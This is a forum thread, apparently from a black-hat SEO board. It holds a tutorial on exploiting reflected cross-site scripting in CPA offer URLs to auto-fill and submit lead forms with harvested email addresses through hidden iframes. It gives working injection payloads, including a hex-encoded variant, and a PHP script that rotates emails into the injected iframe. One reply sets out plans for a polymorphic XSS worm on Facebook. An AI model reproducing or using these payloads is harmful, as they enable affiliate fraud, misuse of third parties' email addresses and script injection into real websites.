1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[TUTORIAL] Auto-Fill and Submit CPA Forms

Discussion in 'Black Hat SEO Tools' started by artizhay, Feb 14, 2011.

  1. artizhay

    artizhay BANNED BANNED

    Joined:
    Nov 21, 2010
    Messages:
    1,867
    Likes Received:
    1,335
    In this tutorial, we will cover how to automatically fill and submit a CPA form. I have to give credit for sparking the idea to http://www.blackhatworld.com/blackhat-seo/members/121533-digitalgangster.html in my http://www.blackhatworld.com/blackhat-seo/black-hat-seo-tools/276584-tutorial-integrate-cpa-frames-regular-form.html thread. I also give credit to http://www.blackhatworld.com/blackhat-seo/members/30824-f0rked.html for further auto-submit inspiration, starting with pre-populating CPA offers.

    We will navigate through the tutorial using the scientific method because I am extremely bored.

    Question
    Can we effectively integrate a javascript injection into a URL to be loaded into an iframe so that the form will automatically fill and submit?

    Background Research
    I already knew how to do a javascript injection directly from the address bar by erasing everything from the bar and typing code, such as:
    Code:
    javascript:alert("Injection.");
    which would cause the message "Injection" to pop up on the screen.

    However, I needed something that could be appended to a URL so that I could easily put it into an iframe on my site. I resourced Google and found the http://ha.ckers.org/xss.html at ha.ckers.org. I used the first example to concoct my own injection.

    Hypothesis
    With the proper injection string, a code can be appended to the end of a query string parameter by using techniques inspired by PHP injection in order to close the hidden input field used for the query string parameter and create our own code to execute javascript.

    Materials
    You will need:
    • Large e-mail list
    • Website
    • CPA network membership
    • Knowledge of how to retrieve and update your e-mail list

    Procedure
    1. You will need to test your e-mail submit CPA offers to see if we can exploit them. Please note that you will need to use your offer's real URL rather than your CPA tracking link.

    To test for an exploit, add the following code to the end of the URL then load the page:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.";});</script>
    So your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=239"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.";});</script>
    Your offer's URL most likely has parameters in the URL that tell it who's accessing it and who to credit the lead to. It looks something like ?id=293&ad=2898 etc. You've seen them before. Usually, the CPA pages store these values in hidden input field on the page, so those parameters would end up looking like:
    Code:
    <input type="hidden" name="id" value="293">
    <input type="hidden" name="ad" value="2898">
    As you can see, the parameters just get placed into the HTML. So if you add your javascript injection on to the last parameter, then you can directly manipulate the HTML.

    The last parameter in my example was &ad=2898. What if you edited it so you can manipulate the page? Changing it to &ad=2898"><img src="http://site.com/img.jpg adds an image to the page.

    Basically, what the site is doing is this:
    Code:
    <input type="hidden" name="ad" value="{your parameter}">
    So if you change it, it becomes this:
    Code:
    <input type="hidden" name="ad" value="[B][I][U]2898"><img src="http://site.com/img.jpg[/U][/I][/B]">
    The bold, italic, underlined bit is our "parameter" (*wink*) that we passed. As you can see, we left out the closing "> tag in the URL parameter because the site is designed to add that automatically since it thinks it's going be given a proper value such as 2898. So you can add images...or a javascript code.

    2. Now that that rambling is done, we can move on to the actual exploit. You need to find the name of the e-mail input field. If you know how to do this, then great. If not:

    Load up the offer's source code. (View>Source, Page>View Source, Tools>View Source, many many ways depending on the browser). Hit CTRL+F to search and search for "<form". This will find the form.

    Find the inputs (begin with "<input") and find one that obviously is an e-mail input. E-mail submit pages usually only have 1 or 2 inputs so it won't be hard to find. It will say "E-mail" next to it or the name attribute (name="") will say "email", "em", "appData[em]" or something like that.

    Once you find it, take note of what the name attribute is (<input type="text" name="myEmail"> -> name is myEmail).

    3. We need to edit our injection to make sure we can inject an e-mail into the form. If your first injection test worked, this will most likely work as well. So load up the offer again without any injection code, just the plain, original URL, and add the following to the end of the URL:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].[COLOR="blue"]email[/COLOR].value="email@email.com";});</script>
    So your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].[COLOR="blue"]email[/COLOR].value="email@email.com";});</script>
    You will need to replace the blue text with the input name you got in step 2.
    Load the page and now the input box should say "email@email.com".

    4. If step 3 worked, we can move on. If not, make sure you used the correct input name and kept the proper syntax I provided. If you're sure you did it right and it still doesn't work, then move on to a new offer.

    All we need to do now is add one bit of code to submit the offer. So, again with the original URL of the offer, add the following:
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].[COLOR="blue"]email[/COLOR].value="email@email.com";document.forms[0].submit();});</script>
    So again, your URL will look like:
    Code:
    http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
    Load the URL and your form should fill with "email@email.com" then submit automatically.

    5. If step 4 worked, all you need to do is include that URL in an iframe. You must use single quotes to enclose the iframe attributes since our URL uses double-quotes and you must keep those double quotes.

    So:
    Code:
    <iframe src='http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>
    You may want to blank your referrer with referer.us. So you would just insert "http://referer.us/" before the URL. Your injection will still work.

    Conclusion
    You can use this on virtually any web page to turn every visitor into a lead as long as you have a lot of valid e-mails. You will need a way to access your e-mail database and mark them as "used" once you use it to submit your offer. I don't teach that here but the way I do it is with a MySQL database.

    I have a table called "mass_mail" with one field called "email" and one called "used". I select the first e-mail where "used" equals "no", use it for the offer, then update "used" to say "yes".

    You could also use a PHP array:
    PHP:
    $emails = array(
              
    => array(
                   
    "email" => "email_address",
                   
    "used" => "no"
              
    ),
              
    => array(
                   
    "email" => "email_address",
                   
    "used" => "no"
              
    )
    );
    and then search it for the first unused e-mail.
    Or store them in a text file.
     
    • Thanks Thanks x 57
    Last edited: Feb 14, 2011
  2. RobBanks

    RobBanks Junior Member

    Joined:
    May 14, 2010
    Messages:
    165
    Likes Received:
    42
    Location:
    in the mountains
    thanks for putting your time into your recent threads and explaining everything so clearly. your the shit! i was wondering what resources you refer to when getting into this kind of html and code? I understand the concept of this and know some html but for little things when you get stuck where would u go to learn this stuff? i can never seem to find good info relating to iframing except for on BHW! great posts man thanks again
     
  3. SuperBlackHat

    SuperBlackHat Power Member

    Joined:
    Feb 2, 2009
    Messages:
    576
    Likes Received:
    116
    i think ima give this a shot
     
  4. f0rked

    f0rked Registered Member

    Joined:
    Jan 25, 2009
    Messages:
    71
    Likes Received:
    64
    A much less eloquent solution than using a database, or array would be to simply pull the emails from a file, store the first line as the email to be used, then remove the line.

    PHP:
    <?php
    function getEmail(){
        
    $file "emails.txt";
        
    $emails file($file);
        
    $email array_shift($emails);
        
    $emails[] = $email;
        
    file_put_contents($file,$emails);
        
    $email trim($email);
        echo 
    "<iframe src='http://offerplace.com/index.php?id=388&ad=2398\"><script%20src=\"http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js\"%20type=\"text/javascript\"></script><script%20type=\"text/javascript\">$(document).ready(function()%20{document.forms[0].email.value=\"$email\";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>";
    }
    getEmail();
    ?>
    Crude example, but it works. Emails would be pulled from emails.txt, one email per line.
     
    • Thanks Thanks x 3
  5. facebookdude

    facebookdude Elite Member

    Joined:
    Feb 28, 2010
    Messages:
    1,506
    Likes Received:
    2,489
    Thanks for the nice share!
     
  6. simplyblue

    simplyblue Junior Member

    Joined:
    May 11, 2009
    Messages:
    195
    Likes Received:
    470
    Quality content and a much appreciated tutorial.
     
  7. cookiemonste

    cookiemonste Jr. VIP Jr. VIP Premium Member

    Joined:
    Aug 9, 2009
    Messages:
    209
    Likes Received:
    91
    nice tutorial!
     
  8. artizhay

    artizhay BANNED BANNED

    Joined:
    Nov 21, 2010
    Messages:
    1,867
    Likes Received:
    1,335
    I'm compiling a list of networks with exploitable offers. It's modest, but PM me if you want it.

    To quickly test an offer for exploitation, append each of the following to the end of the URL until one works:

    1. Default type - directly append the code (should display "Test." on the screen):
    Code:
    "><script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">function doSubmitNow() {alert("Test.");} $(document).ready(function() {setTimeout("doSubmitNow()", 3000);});</script>
    2. Replace all spaces with %20
    Code:
    "><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">function%20doSubmitNow()%20{alert("Test.");}%20$(document).ready(function()%20{setTimeout("doSubmitNow()",%203000);});</script>
    3. Encode into hex values with http://ha.ckers.org/xss.html#XSScalc
    Code:
    %22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%6A%61%78%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%61%6A%61%78%2F%6A%71%75%65%72%79%2F%6A%71%75%65%72%79%2D%31%2E%34%2E%32%2E%6D%69%6E%2E%6A%73%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%6F%53%75%62%6D%69%74%4E%6F%77%28%29%20%7B%61%6C%65%72%74%28%22%54%65%73%74%2E%22%29%3B%7D%20%24%28%64%6F%63%75%6D%65%6E%74%29%2E%72%65%61%64%79%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%53%75%62%6D%69%74%4E%6F%77%28%29%22%2C%20%33%30%30%30%29%3B%7D%29%3B%3C%2F%73%63%72%69%70%74%3E
     
    • Thanks Thanks x 2
  9. ch8878

    ch8878 Elite Member

    Joined:
    Mar 21, 2009
    Messages:
    2,242
    Likes Received:
    428
    Gender:
    Male
    Occupation:
    Gamer
    Location:
    Youtube
    Home Page:
    When doing this won't your "Click Rate" be to high ?
     
  10. fun4uoc

    fun4uoc Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 25, 2007
    Messages:
    1,199
    Likes Received:
    1,041
    Location:
    ☆ ♔ ☆ ♔ ☆ ♔ ☆
    Throw some cheap traffic at the offers.
     
  11. ch8878

    ch8878 Elite Member

    Joined:
    Mar 21, 2009
    Messages:
    2,242
    Likes Received:
    428
    Gender:
    Male
    Occupation:
    Gamer
    Location:
    Youtube
    Home Page:
    Can you PM me some were to get cheap traffic to use ? Also are you using landing pages or blogs or mini sites ?
     
  12. fun4uoc

    fun4uoc Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 25, 2007
    Messages:
    1,199
    Likes Received:
    1,041
    Location:
    ☆ ♔ ☆ ♔ ☆ ♔ ☆
    I'm not doing this, as fraud hurts everyone in the long run.

    There are plenty of companies out there.

    http://lmgtfy.com/?q="cheap+traffic"
     
    • Thanks Thanks x 1
    Last edited: Feb 15, 2011
  13. ch8878

    ch8878 Elite Member

    Joined:
    Mar 21, 2009
    Messages:
    2,242
    Likes Received:
    428
    Gender:
    Male
    Occupation:
    Gamer
    Location:
    Youtube
    Home Page:
    Oh, OK so you don't know if this works or not I am guess not.
     
  14. f0rked

    f0rked Registered Member

    Joined:
    Jan 25, 2009
    Messages:
    71
    Likes Received:
    64
    It's not complicated at all. Everything has been broken down quite well by the OP, and what he didn't include, I included in my above post. The hardest part of all of this is finding the offers that it will work with. The OP has even offered to give you a list of the networks that has offers this works with. That narrows down the search even further as to which offers this works with. If you find it too difficult to get this setup, this method is not for you. Even if someone implemented it for you, you'd never see a cent of your earnings as you'd get banned from the network with the quickness.
     
    • Thanks Thanks x 1
  15. fun4uoc

    fun4uoc Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 25, 2007
    Messages:
    1,199
    Likes Received:
    1,041
    Location:
    ☆ ♔ ☆ ♔ ☆ ♔ ☆
    lol...

    Why the hell wouldn't it work?

    This is a common practice to lower your epc.
     
  16. blade_

    blade_ Registered Member

    Joined:
    Oct 15, 2010
    Messages:
    77
    Likes Received:
    47
    I thing that injection will still work and with GhostCPA fake referral. Can anyone confirm me ?
     
    Last edited: Feb 15, 2011
  17. artizhay

    artizhay BANNED BANNED

    Joined:
    Nov 21, 2010
    Messages:
    1,867
    Likes Received:
    1,335
    How does GhostCPA transform the URL? Since the point of blanking/faking is to modify the header information while still getting you to the same exact location that you originally requested, I don't see any reason why any faking/blanking would cause the injection to fail.
     
    • Thanks Thanks x 1
  18. DigitalGangster

    DigitalGangster Regular Member

    Joined:
    Jun 24, 2010
    Messages:
    387
    Likes Received:
    230
    I have to say this method is very risky the whole idea why i started getting into this is because my ultimate goal was to get enough money from cpa from facebook to find the xss experts to find me xss exploits in big websites like facebook,youtube, twitter etc.

    My ultimate goal was to pretty much code a polymorphic xss worm, well pay someone to do it. So i could spread the worm through any of those big websites.

    Imagine this, unleashing a xss polymorphic worm on facebook , that would mean that for everytime someone views the infected profile they would get infected and you can totally modify the DOM. That means you can make them like a fanpage , post a status update, send a message, pretty much any facebook action without them knowing and at the same time getting infected.

    I see money into that, cause thats where true viral is at. If you can get the whole picture.
     
  19. blade_

    blade_ Registered Member

    Joined:
    Oct 15, 2010
    Messages:
    77
    Likes Received:
    47
    Thanks for the info about faking referral ;)and other that you provide ;)
     
  20. cristianraiber

    cristianraiber Regular Member

    Joined:
    Nov 22, 2008
    Messages:
    293
    Likes Received:
    381
    Occupation:
    Onliner
    Location:
    Internet
    how about setting up a page - a freebie page with a form that collects that info:

    1. email
    2. name

    whatever else you need for the CPA offer and use the above mentioned to pass that info to the CPA offer whilst also faking the referal ? :)